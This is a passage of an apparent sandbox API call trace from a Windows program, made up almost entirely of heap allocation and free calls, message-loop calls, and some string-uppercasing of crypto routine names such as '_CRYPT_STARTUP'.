RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978568 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0269.046] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0269.046] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0269.046] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0269.046] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0269.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.049] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e98 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e80 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.050] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.050] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.050] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.050] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e20 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0269.050] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.051] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.051] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0269.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0269.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0269.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e08 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0269.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0269.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 